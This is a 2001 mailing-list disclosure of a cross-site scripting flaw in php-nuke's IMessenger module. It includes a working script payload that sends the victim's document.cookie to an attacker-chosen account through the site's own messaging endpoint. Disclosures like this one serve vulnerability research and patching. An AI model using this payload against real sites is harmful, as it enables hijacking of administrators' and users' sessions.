Vulnerability Development mailing list archives
Serious bug in IMessenger ( php-nuke )
From: frog frog <leseulfrog () hotmail com>
Date: 16 Dec 2001 03:00:01 -0000
IMessenger accept javascript. We can so directly execute javascript on the computer of a member or the webmaster. For example, if I send the script <*s*cript>window.location.href='http://www.SERVER. com/im.php?username_to=h4x0r&subject='+ document.cookie +'&message=message&action=send' ;</s*cript> (without the '*'), to the webmaster, his cookie will be sent to the user h4x0r. PHPNuke was alerted. frog-m@n
Current thread:
- Serious bug in IMessenger ( php-nuke ) frog frog (Dec 16)